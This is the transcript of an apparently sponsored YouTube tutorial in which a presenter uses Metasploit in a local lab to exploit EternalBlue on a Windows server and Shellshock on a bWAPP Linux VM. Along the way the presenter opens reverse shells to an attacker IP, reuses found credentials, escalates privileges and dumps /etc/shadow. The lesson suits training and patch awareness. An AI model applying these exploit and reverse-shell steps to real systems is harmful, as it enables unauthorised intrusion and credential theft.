Metasploit

Captions
- And then we got the WIN. So we like WIN 'cause guess what that means. We successfully attacked the system. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more like a Windows prompt and that's because that's exactly what it is. So if I do like whoami I get nt system authority. I have full control over this machine. I am the administrator and it was a point and click thing. And that's the power of Metasploit. If there is something like this that's out there, I don't have to do the hard work 'cause I've done EternalBlue attacks manually. That is a lot of work. The cat settings.php. Oh look, credentials. Now I go okay. So what can I do? Can I kind of work with that? Can I su to bee, and as for, okay, bug. Oh, look, I've just elevated my privileges. Now I'm the bee user so if I do id or whoami, it tells me I'm bee, I'm no longer www-data. If I do sudo -l to list my sudo privileges, I put in bug, that's my password. It tells me I have full sudo privileges here. So now I can sudo cat /etc/shadow, and there's all the password hashes, that's protected and only administrative users can look at this. I have that capability. I have full control over this machine at this point. (upbeat music)
- Everyone, David Bombal back with Daniel from ITProTV. I really wanna thank ITProTV for sponsoring this video series. In a previous video which I've linked here and below, Daniel showed us how to do a SQL injection. Daniel, what are you gonna show us this time?
- Well, today we're gonna have a little bit of fun with my favorite, closest thing that you're probably gonna get to a 'point and click' hacking tool, which is known as the Metasploit framework. Now, don't get this confused with Metasploit Pro, that's a pay for money kind of thing.
Metasploit framework is free for anybody to go and download and work with and play with, a framework, and what that means is like, we have all sorts of great exploits in here. You just have to point it at the right target, give it the right options, and if everything goes to plan, you should be hacking away and having access to something very, very shortly. So Metasploits, yeah. We'll shorten that down to Metasploit and that's what we're gonna look at today.
- That's great. I mean, this is like covering your favorite tools. So, this is one of your favorite tools because?
- It's one of my favorite tools because time is of the essence a lot of times, and sometimes you don't wanna spend all the time that it takes to hack something manually. You've done it. You know, like, "Oh yeah, I've seen this before. I just have to do X, Y, and Z," but X, Y and Z can take up a bit of time. Probably there's a Metasploit module for that, which means that there is an exploit built into Metasploit that all you have to do is look for it and use it and fire and forget. And then it was easy. It took you much less time. So it's a big time saver, plus it has a lot of different functionality wrapped around it that you end up using in different ways. There's scanners that are available inside of it. So if you're looking to scan certain types of things you can kind of jump in there and play with that. But if you're just looking for, "I just wanna hack something, I know this is a well-known vulnerability, I've found a website or a server or something on the internet that contains that vulnerability," you just fire up Metasploit, give it the options and fire and forget and you should be having some access. So, I liked that aspect of it. Saved me some time, let me work on things that are actually making me scratch my head and making me go, "Hmm, I feel like there's a way into this. And I just don't see it quite yet," or I think it's like this and you're having to play with options.
There's a lot of manual stuff that can go into your day when you're working through, if you're doing like a CTF or if you're on a pen test itself, especially if you're doing a pen testing engagement, you want to spend all your time manually hacking things that you know you can do, but take a lot of time. Just let Metasploit do it for you. So I liked that part of it.
- That's great. I mean, in this video, you're gonna show us how to hack. Is it a Windows box? Is that right?
- Yeah. We're gonna have two boxes today. I'm gonna go for a Windows box first, Windows server, and the other one is going to be a Linux server. So we're just gonna show you how easy it can be. We'll take a little bit of set up again. Like I said, there's some options. What do I mean by that is information that we need to feed it, so it knows like, "Oh, that's the IP address of the target you would like to hack at? Where am I coming back to? If I was maybe giving you a shell, how would that look?" So you got to set a few options but they're very descriptive and straightforward. So it shouldn't be too big of a lift for us.
- You know, I think we need to just state from the outset. You have downloaded VMs, you're running this locally. You're not attacking a remote device. This is a penetration lab or testing lab that you're running locally. Is that right?
- Yes. Absolutely, I just spun up, I think, the VM for Windows. I was running like, I had a 2008 R2 server ISO laying around. I said, "Okay, well, let's use that. That's easy lift." And then the other one was another one of these hacking playgrounds called bWAPP, which is the broken web application something, something, I forget the... Actually I'm not great with acronyms, but it's another one of those kind of prebuilt appliance type VMs that has a broken web application, has a bunch of different vulnerabilities to it. And one of them is gonna be something we can exploit with Metasploit. So we'll go after that, that way.
- Yeah.
I'll put links below for people to download some of the stuff, but Daniel, without further ado, let's show us how it's done and then we'll get into the weeds of what you actually did.
- All right. I've got an icon on my desktop but if you wanna fire it up from the console itself you can just type in msfconsole. That's mike-sierra-fox-console, all one word, lowercase, and it'll go, but I'm just gonna click my little icon that I've gotten in my task bar there. And that's going to fire up, and if you're going, "Whoa, Daniel, that is super small." You're absolutely right. I'll make it a little bit bigger so we can all see it. I'm just gonna let it fire up for a second. What it's doing right now is just initializing the database of exploits and auxiliary options that it does have. And once it's done, it'll drop you to this little thing here and I'll just make this look a little bit bigger. It's probably flashed the screen. It's a little weird, but there we go. And it always has some funny ASCII art at the onset there. So this is not normal. Like it's not a part of the program, it's just for fun. The part of the program is right down here where it says msf5, that's what we wanna look at. So, what I'm gonna do is I'm gonna try the tried-and-true, well-known, well executed and well adapted to crypto-ransomware goodness, known as WannaCry, which was the EternalBlue exploit that was released. You know, it was found from the NSA and released a few years ago and you think, "Oh man, that's kind of old." It's funny. There are still areas in the world which are using older versions of Windows because they are pirated versions and they can't update. So their infrastructure is still maintained on that and they can't update it. So they're kind of stuck. What do they do? Well, they can get hacked if they leave it up and attached to the internet. So it's still a viable thing. It's something that we still see in the real world and in the live world today.
So don't discount old EternalBlue, it's still running around. So to find it, I just do a search, type in the word search. Get my mouse out of the way and type in what I'm looking for. So in this case, it's eternalblue. And then that will return back anything that it defines as related to eternalblue that it can think of based off of your search term. So you can get a little crafty with that if you need to, if you're looking for something specific. Sometimes not everything comes out very easy but this one does. And I have a few options. You'll notice I have the matching modules. And then this shows me numbers. It starts counting at zero. So number zero will be this one and then it has a description right over here, MS17-010. And it tells me it's EternalRomance, EternalSynergy, EternalChampion. These were the original names for eternalblue before it kind of landed on that. So they're all kind of doing the same thing just in vaguely different ways. But it also has this: auxiliary/scanner/smb for MS17-010. That tells me that it does a detection check for EternalBlue. Okay, well, let's start there. Let's do a scan and check for that vulnerability against our machine. So if I do use and I give it the number, so I don't even have to like copy and paste this. Normally you can just copy and paste that in there, or you can type it in, but now they've updated it. You can just use the number. So that's even easier, right? So I can just say, use 1. Bam. You'll notice my prompt has changed. It's a little bit small and I'll give you a little more real estate there. Plus, there we go. I can make sure you guys can see all this. There we go. And now I have jumped down into that scanner for that. So all I can do now is check what options it needs. So I'll just type in options and here are the options. So because I've got to kind of blow it up a little bit, it's kind of word wrapped and doing some funky stuff, but I'll walk you through this.
So we've got check for the architecture. That setting is set to true, tells me whether or not it's required and then gives me a description of what that does. Checks for architecture on vulnerable hosts. Okay, great. So, this is something it will check for even though it's not a required thing, that's just a default, right? So you can kind of walk through this. What's important for us right now, well usually the main thing you need to do is tell it what's the target. And typically that is through this option right here, RHOSTS or RHOST. The two main ways in which you see that usually vetted out. So if you see RHOSTS or RHOST it's asking what is the remote host in which you wish to attack. And you can see that's right over here. The target host or hosts, and you can put the range or the CIDR identifier and also the good stuff, right? I think that's all I need here. It's already got the port set which is the right one which is 445. So I just set that. So set rhosts and that will be the IP of my server, which is 21. There we go. Set that--
- [David] Your Windows server, yeah?
- Yeah, this is my Windows server. I can check the options again to make sure that that went through and we can see now that has changed to the IP of that server. At that point, you can type one or two things. If you want to be super elite, you type exploits. So I wanna be super elite, (David laughs) so I'm gonna type exploit. There we go. And we see that it comes back very quickly. The host is likely vulnerable to MS17-010, and then it even gives me that it is a Windows Server 2008 R2, sweet. So, we've got good information. Now, all we have to do is gain that access, right? So I'm gonna search again for eternalblue. I can't type, (Daniel chuckles) blue, there we go. And then I do have some options. I have some different options. Some may work, some may not work. This is sometimes where it can be a bit of a trial and error thing. So you might just...
Good news is there's not many options for us here, so it wouldn't take as much time to kind of walk through each one of these if we were kind of playing a guessing game. One of them right out of the gate tells me this is for Windows 8, right? Well, I'm not attacking a Windows 8 box. So I can go ahead and disregard that. But what's another one that we have here, we've got this one is an exploit. And you'll notice that they start with exploit, right? exploit/windows/smb, and then gives the Microsoft equivalent of a CVE for the actual vulnerability for their system. It even tells you like whether or not it works very well. This is average, but for us this is gonna be the one we want. Right? So the good news is, out of the gate it was the first one that we needed. So I'm gonna do use 2. So use 2 'cause that's the one we want. Our prompt has changed and we need to go in here and check those options. Now that we've got those options up, you'll see that there's RHOSTS right there. So obviously that's something we need to give it. It did also kind of tell us right here, no payload is configured. The payload is, once I attack this thing I can make it do whatever I want. What is it that you want me to make it do? So it's saying nothing is configured and it's defaulting to this payload, which is a reverse shell. So send me back a command prompt so that I can control the machine. I don't wanna use the meterpreter, so I'm gonna change it so that you can see that and kind of get some more information on how to use this, but it's a pretty simple thing to do. All right. So let's start setting some stuff, and you'll notice that down here, the exploit target information is there as well. It tells me Windows 7 and Windows Server 2008 R2 (x64). Hey, isn't that the one we just found? It is. (David laughs) Like it was planned, right? So let's see here. Let's set that rhosts. Rhosts, it used to be that case sensitivity was a thing, but now it's not.
Or I think it was, but now it's not. So you don't have to worry about that. And that is 10.10.10.21, all set. Good to go. What else do we need to set here? As far as the target goes, I think that is it. Now we need to set that payload. So I wanna change that payload. So I'm gonna say set payload and I wanna set it to something I wanted. Well, I know this is a Windows thing. If you're like, "Oh, you know what? Payloads are available." You can kind of do like a list payloads and they'll show you the ones that you can, oh I'm sorry. I think it's show payloads. Do a show payloads. There's a lot of payloads you can give it. So I'm not gonna bog us down with that. I already know the one I want. So windows/x64/shell_reverse_tcp. There we go. It didn't complain. So I must've chosen something that actually worked for this. Go back to options and we can see now this has been set under the payload. Now all I have to do is set the LHOST, which is the listening host. This is gonna be my attacking server so that it knows where to send that information to and what port to go on. So I'm gonna change the host and the port because the Windows box doesn't know what 127.0.0.1 is other than itself. So that's not gonna work. So we need to set lhost, which will be my box, it's just 10.10.10.10. And then I like to set my port. So lport to be something that's probably gonna bypass any kind of firewalling that might be. So 443 is a great one because you know a lot of times firewalls allow port 443. So if there was any firewall blocking on something like 4444 I wouldn't have an issue with this. I would still get my shell. At this point, we are ready to Script Kiddie it up and type the word exploits. Right? (David laughs) Let's do that, exploits all day long. All right. So this is all information wrapped around what it's doing. It's trying to just let you know whether or not it's being successful, what's happening and what it's trying to do at that point in time.
A lot of interesting things going on here. I do like how it says the overwrite completed successfully, that makes me feel good about this attack. I have seen this kind of like, I'd have to do it over and over and over again. It didn't just work the first time. I had to be a little persistent. It will try to re-attack, attack, attack over and over again. So sometimes that's the case. We are also working in virtualization. So when you're throwing attacks like this at machines it can start to break things, right? Because it's not really, you know, machines aren't designed to be attacked. They're designed to work normally. So if it's messed up... So you can see this like failed right out of the gate. Right? But that's okay 'cause it's trying again. It's gonna try something else and see, well maybe if we try a little move in here. Oh, look at that. And then we got the WIN. So we like WIN 'cause guess what that means? We've successfully attacked the system we're going on, okay?
- [David] What do I do now?
- It says we won. What do we do? I'm gonna hit enter. Oh, there we go. Sometimes that happens. You'll notice that my prompt has changed. And let me get down here a little bit. You'll notice it no longer looks very much like a Kali prompt. It looks a whole lot more like a Windows prompt. And that's because that's exactly what it is. So if I do like whoami, I get nt system authority. I have full control over this machine. I am the administrator. And it was a 'point and click' thing, I mean hope it was pretty easy. It's at least as far as what you guys saw on the other end. And that's the power of Metasploit. If there is something like this that's out there, I don't have to do the hard work 'cause I've done EternalBlue attacks manually. That is a lot of work. Actually ended up writing my own EternalBlue attack script because I was like, man, I'm never gonna remember how to do all these things. I'll have to create a workflow.
So lemme just create a script that does it all for me. And then it was like, "Oh no dog. You just got to go over to--" (chuckles) So use Metasploit. It's got the module. Oh, that's right, Metasploit, it's there. So it makes your life a whole lot easier for getting those low-hanging fruits without spending a lot of time and effort on it. So there's a Windows machine against a system level problem that it has. And we explored that.
- You have admin access.
- Full admin access.
- You could load something on there so you could get back to this later, but it was re--
- Oh yeah, I could upload malware here. I could create a backdoor user, create a PowerShell script that does X, Y, or Z. I'm in full control at this point of this machine. I can turn on, like, if it didn't have RDP enabled I could turn on RDP, create a user that's an admin user. And then log in using RDP and have my full Windows graphical loveliness, all I want. Then I can do post exploitation things like grabbing password hashes and cracking them so that I have other people's passwords. And maybe I can use those passwords to gain access to other machines that don't have this. So, it's a great stepping stone. So once you find some easy access such as this, it's just now that the tumblers are gonna start to fall and I'm starting to work my way through the network at large instead of just the one machine.
- So, I mean, basically what you did is you used Metasploit. That's just something that you can download. And then,
- You're right.
- And all you did is you just followed some prompts, you entered some very basic information, IP address. I can't remember what else. It wasn't very much. (chuckles)
- It wasn't very much.
- You basically just told it which attack to launch. And I just wanted to emphasize this. If you hadn't used this, it would have been a lot of work. Like you said, to be able to crack this, is that right?
- Yeah, absolutely. Like I said, I've done it manually before and that is not the way to fly.
This is so much easier. Now I have more control over those manual options. It's easier for me to make fine tune adjustments or things of that nature to the stuff that I've done. But for the most part these scripts work right out of the box. We had one failure and then it went right away and said, "Oh yeah, we're good. I've got it. Here you go." And I just sat here and waited. That's all I had to do, was wait. I could have been running other scans and doing other things while this is hacking stuff for me. So that automation of doing things like that, making your workflow so much faster, grabbing low hanging fruit that it's not gonna take you forever so that you can start to, well, you probably will need to, at that point, pivot into, I don't know, if they're using bad security like this, running old server systems that are unpatched, things of that nature, then yeah. They're kinda getting what they got coming. It's probably not gonna be too easy to get through the rest of it either, but you do see that from time to time. Sometimes developers spin up machines like this so that they can start working on something because that's what they had available.
- I heard of a very big company that got hacked recently that had some server, wasn't it that SolarWinds or something?
- Oh yeah, that's right. (David laughs) Now, to their defense that was a 0-day or a zero day exploit where some very smart people found a very esoteric flaw, built a tool that exploits that flaw and exploited it. So like, I don't wanna throw SolarWinds too hard under the bus on that. Like there's no way they could have prepared for that. They just didn't know that it was a flaw. Somebody found it, exploited it. They just happened to be one of the biggest names in the industry and are hooked into some of the largest organizations such as the United States Government and Military, which is what caused the problem.
- So I mean, this worked because there was a vulnerability or an exploit in a Microsoft operating system that--
- Yeah.
- And this is like you said, this is the reason why you wanna patch your systems, yeah?
- Exactly. This is why you wanna make sure you're doing the updates and patching that comes through. Have a good patching cycle. Can't tell you how many pen testers I've talked to. They're just like, man, if they just had had a scheduled patching cycle where they are applying patches in a systematic way, this never would have happened. We never would've gotten this far or that attack wouldn't have been successful or such and such and such. Like, how many times I've heard that? I can't tell you. It's something as simple as just making sure that you are updating and patching your systems.
- So, I've heard Linux is secure. I mean, you're hacking Windows but Linux can surely not be hacked.
- Yeah, I hacked. That's absolutely not true. (David laughs) I hack it all the time. Again, I wanna kind of give you that look, so I'm gonna use an older thing, but if you're not updating, it will still be available to you. And I just wanted, again, more to showcase Metasploit than it was to show my elite hacking skills. It was more about let's take a tour of Metasploit and how it works and what it can do. So it was cool. We can see what it does with Windows. Let's go after something completely different like Linux. Right. So let's do that. I'm gonna get out of my shell here.
- [David] I mean, that's the point. I mean, this stuff happens all the time.
- [Daniel] Right.
- [David] I'm just showing like a simple example for demonstration. Well, I mean, I shouldn't say simple. You're showing an example for demonstration purposes but I mean, this stuff takes place all the time.
- Absolutely. And then this is just what I could think of immediately off the top of my head so I can come in here again and do these demonstrations.
There are other vulnerabilities that are much more current and recent that have Metasploit modules. So if I had that infrastructure set up we would have been able to demo that. That would have just been a lot of lift to like build an infrastructure that would allow for something like that. So I went with the easy button so that we can take a look at Metasploit and what it can do. So I've got another server, Linux server, and this time I'm gonna search for shellshock. I don't know if you guys remember that one, but shellshock was a horrible bug that plagued the Linux operating system and went undiscovered for many, many years. And once it was discovered, it was like, "Oh no, this is no good." Because it gave you access into people's systems and allowed you to, what's it called? Remote code execution. And I can execute code from a remote location. It would do those things or commands. So that was bad. So my server, after I've done all my pregame, like my recon and things, I've found that it's running Apache, it's got a web server going. I found the CGI bin area, which is where you're looking for, if you're looking for shellshock. And then I went to Metasploit and I found this one right here which looked to fit my bill very nicely. Right? So it's going after Apache under the mod_cgi bash environment. Oh, everything (smooch), looking for that exactly. Now I did some testing. You can also find some testers, I think there's an auxiliary scanner. Yeah. So first, specific one, DHCP clients. Oh, here's one for Apache multi. So you could have scanned for it using this as well. I just did my own recon on that. And there we go. I know exactly where I want to attack this thing so I know what options to set. Right? That's the options. So for this one, it's going to be, let's see. Let's take a look at the options and we're gonna use 5, that's right. Use 5. Now look at those options. And we have a few, let's see here.
Now we are gonna set a bit more options than we did where, well, I had to set the host and then set that payload correctly. Right? But let's take a look. Some of the things that we do need, like the header, that's gonna go out. These are the HTTP headers that you wanna use, as it says right there. And if you need to change that to like a POST method, but GET is the one we're gonna use. So that's fine, that's the default. I do need to change that. I'm not gonna use User-Agent. I wanna set that to the Referer header, which is where I found the vulnerability in this application. So I need to do that. Let's do that: set header, which will be Referer. So options again just to make sure that's set. I'm super anal about making sure everything got set the way I wanted it to because I have made typos in the past. And you're like, "Why isn't this working?" So typos can definitely kill your game really quickly. I don't know how many proxies. I do have an RHOST though. Right? There it is right there. So let's set that. Set rhosts, which is 10.10.10.17 for this server. All right. Show me those options. And let's see here, there it is. Set that, well, great. It's over port 80, so that's fine. I think that's all good. Our path, that's fine as well. Don't need any of this. It looks like our target. Oh, we got one more thing. TARGETURI. This is the actual path to the script that we're gonna exploit that I have found using Burp Suite. And again, once we get to the Burp Suite, sure you'll be like, "Man, he's got all this information. Where does he get it from?" Burp Suite. Right. So we'll have some fun with some Burp Suite coming up very shortly. Not today, but in another one. All right. So let's set that targeturi. So set targeturi which if I remember is bWAPP, that's then cgi-bin/shellshock.sh. Okay, now that I've got this set, the last thing I have to do is set our payload which is this person right here. Right? And I'll just stick with the default on that.
We don't need to fiddle around with it. So set lhost of 10.10.10.10 which is my Kali server. That's the local host or the listening host, right? With that I'll leave the port. What the heck? I know that should be fine. And I will hit exploits because it is time to exploits. Oh yes. The session has opened, right? 'Cause it says right there, meterpreter 2 has opened. So this is using the built in session management, shell management that Metasploit has available. It's a very handy thing as well. Just depending on what you're attacking you might wanna go with one or the other, but I can just type in shell. And then this is one channel created, id. Hey, look at that, hostname like that. You do the same on the bee-box. If I wanna pretty this up, I can throw some Python at it. Let's see here, import a nice pty shell of bash. So pty.spawn and throw this in there, /bins/bash. Bam, bam. And now, oh, it didn't like it. You're right. Yeah. Import pty. (chuckles) Okay. That's right. That was absolutely wrong. Lemme try that again, python -c import. Why am I doing that? Import pty and then there's what I'm looking for. pty.spawn. P-A-W-N. I'm the world's worst typist.
- [David] Don't worry. (Daniel chuckles)
- /bin/bash. There we go. Let's try that. And then you see, I get a nice like regular looking Linux prompt. It's just one way to make that happen, but that's the one I typically use. But now I'm in the system, I can start doing things. Do ls, here's the files, I can do pwd, start looking for ways to elevate my privileges inside the machine. If anything shows itself and, great, I grab the mountaintop. I start doing post exploitation type of information grabbing, password hashes, doing the cracking thing on the back end, looking for pivoting, all of the good stuff. But as you saw, it wasn't that difficult. Throwing some options.
- You got root on that device, did you?
- No, I'm actually logged in with the service account.
As you can see, if I do id, I'm actually logged in with the service account of Apache, which is www-data.
- Oh yes, you were tackling an Apache script, is that right?
- That's exactly right. And since it was running with the permissions of that service account, that's the account we got when it ran the code to give me a shell back to Metasploit.
- But the point is you managed to get a shell on a remote machine by exploiting a vulnerability in Apache or something.
- Yeah. And from here, you just, like I said, you start doing other stuff, right? So where are we? cgi-bin. Let's get out of there. Let's go to cd /var/www, take a look in there. And you'll notice we've got the bee, cd bWAPP. And then here is the actual web application, all the PHP pages that make it up. I can start looking at things like there's an admin folder. I wonder what's in that. Let's go there. cd /admin, ls, cd slash, oh, it's not slash admin. It's just admin. (chuckles) ls there. And I've got like a settings, what if I cat settings.php. Oh, look, credentials. Now I go okay. So what can I do? Can I work with that? Can I su to bee? And as for, okay, bug. Oh, look, I've just elevated my privileges. Now I'm the bee user. So if I do id or whoami, it tells me I'm bee, I'm no longer www-data. If I do sudo -l to list my sudo privileges, I put in bug, that's my password. It tells me I have full sudo privileges here. So now I can sudo cat /etc/shadow. And there's all the password hashes, that's protected. And only administrative users can look at this. I have that capability. I have full control of this machine at this point.
- So yeah, you've just shown us how to get root or administrator on Windows and root privileges on a Linux box.
- Yes. Well, at least one way.
- Yeah, one way. But I mean, it's really cool. I mean, it wasn't that difficult.
- No. If you know what to do, if you're familiar with these things and you just start looking around, you never know what you'll find.
- So I mean, let's step back now and discuss what we've done.
- Yeah.
- So this is Metasploit and this is an application that you just download from the internet, it's free. Yeah.
- Oh yeah. It's totally free. The Metasploit framework. Metasploit Pro is some money, that costs a bit of the Do-Re-Mi, but Metasploit framework, you should be able to just install. So if you're running something like Ubuntu or Mint or some other, Red Hat or something like that, with Ubuntu and Debian variations it would be an apt-get way of installation. If you don't have it, you're running Kali, I think, pretty sure it comes pre-installed and you're off to the races. Use just msfconsole and it fires it right up and you're ready to go.
- Yeah. So man, all you had to do is type that command, then you'd be at the point that you demonstrated. And then it's literally just typing these few commands that you demonstrated.
- That's it. That's it.
- So it's not very difficult. So, I mean, I know Script Kiddie, that kind of thing is kind of frowned upon in the cybersecurity space, but tools like this, are they useful for professionals?
- Absolutely, they're useful for professionals. They're probably not using the free versions of these kinds of tools. They're probably using the professional versions of these kinds of tools, which have more functionality, more customability, right? So you can customize them, customizability, I guess is the right word. You customize them in a way that works and you can make them make changes a whole lot easier. Not that you can't customize this, you absolutely can. But if you're a professional, you will be going with the pro versions of these types of tools.
So like Cobalt Strike and Metasploit, that's another one that's a really high professional grade tool that's very similar to what we're seeing here but has some graphical options to them as well. So does Metasploit Pro, it has a nice graphical option to mess around with, but if you do wanna play with some graphics, you want more of a GUI experience with Metasploit, you can use Armitage, which is free. It's kind of like a graphical front end that wraps around Metasploit and it can be really useful. Plus it's really cool looking. I actually like using it because it gives you some pretty neat options and you can point and click on stuff. So if you want that, just go with Armitage, get that installed. You're ready to go.
- That's great Daniel. I mean, just give us a teaser. What other tools or things are you gonna show us in upcoming videos?
- Yeah, you know I'm sitting here looking at these password hashes and I'm thinking, "Hey, let's do some password cracking." That'd be a good one. That's something that is a good skill to have and understand and know and see how that works. So I typically revert to the easiest one available which is John the Ripper because it does a great job. There are others available, but John the Ripper would probably smoke through at least a couple of these things. And maybe we can find some passwords. We can grab some Windows passwords, see if we can break those as well. And just see how John the Ripper works. We'll play around with that. Obviously we've been talking about Burp Suite. We'll have to do a (speaking in foreign language) of Burp Suite, (David laughs) kind of go through some of the more common options and things that you can do with Burp Suite and see why is that such a popular tool, because it is, and for good reason. So we'll do that as well.
- Yeah. I'm looking forward to it, Daniel. Thanks so much for sharing your knowledge with us and big thanks to ITProTV for sponsoring this, but Daniel, thanks very much.
- Hey, no problem, man. Thanks for having me. (upbeat music)
Info
Channel: David Bombal
Views: 69,668
Keywords: metasploit, metasploit kali linux how to use, metasploit penetration testing, metasploit framework in kali linux, metasploit project, metasploit tutorial, metasploit framework, metasploit tutorial for beginners kali linux, metasploit tutorial for beginners, kali metasploit, kali linux, metasploitable, cybersecurity, eternalblue, eternal blue, eternalblue explained, eternalblue exploit, shellshock, shellshock live
Id: ES2P2hWuzDo
Length: 34min 20sec (2060 seconds)
Published: Fri May 07 2021